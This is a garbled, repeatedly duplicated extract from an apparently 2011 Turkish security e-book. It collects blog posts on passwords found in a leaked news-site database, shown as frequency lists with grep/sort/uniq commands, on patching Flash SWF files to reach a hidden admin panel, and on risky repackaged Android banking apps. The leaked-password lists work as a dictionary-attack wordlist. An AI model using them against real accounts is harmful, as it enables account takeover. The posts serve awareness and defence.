58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 42: Hack 4 Career - 2011

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 43: Hack 4 Career - 2011

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

